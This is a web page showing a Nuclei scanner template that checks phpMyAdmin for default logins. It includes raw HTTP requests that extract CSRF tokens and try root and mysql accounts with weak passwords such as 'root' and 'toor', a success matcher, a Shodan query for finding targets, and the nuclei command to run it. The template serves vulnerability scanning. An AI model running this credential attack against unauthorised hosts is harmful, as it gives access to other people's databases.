phpMyAdmin - Default Login

ID: phpmyadmin-default-login

Severity: high

Author: Natto97,notwhy

Tags: default-login,phpmyadmin

Description

phpMyAdmin contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.

YAML Source

id: phpmyadmin-default-login

info:
  name: phpMyAdmin - Default Login
  author: Natto97,notwhy
  severity: high
  description: phpMyAdmin contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://www.phpmyadmin.net
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
    cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 16
    shodan-query: http.title:phpMyAdmin
    product: phpmyadmin
    vendor: phpmyadmin
  tags: default-login,phpmyadmin

http:
  - raw:
      - |
        GET /index.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: phpMyAdmin={{token2}}; pma_lang=en

        set_session={{session}}&pma_username={{user}}&pma_password={{password}}&server=1&route=%2F&token={{token}}

    attack: clusterbomb
    payloads:
      user:
        - root
        - mysql
      password:
        - 123456
        - root
        - mysql
        - toor

    extractors:
      - type: regex
        name: token
        internal: true
        group: 1
        regex:
          - 'name="token" value="([0-9a-z]+)"'

      - type: regex
        name: token2
        internal: true
        group: 1
        regex:
          - 'name="set_session" value="([0-9a-z]+)"'

      - type: regex
        name: session
        part: header
        internal: true
        group: 2
        regex:
          - "phpMyAdmin(_https)?=([0-9a-z]+)" # for HTTPS
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(header_2, "phpMyAdmin=") && contains(header_2, "pmaUser-1=")
          - status_code_2 == 302
          - contains(header_2, 'index.php?collation_connection=utf8mb4_unicode_ci') || contains(header_2, '/index.php?route=/&route=%2F')
        condition: and
# digest: 4a0a004730450220297bb236d1de47a3db734d57bf02a7fa5c4452f05c70e21842033d1e21b8ae22022100e26c1fd9c6d5f2e9af3eae331b8e797a64e1f8078a50c36ed1342219fd95fa47:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml"

View on Github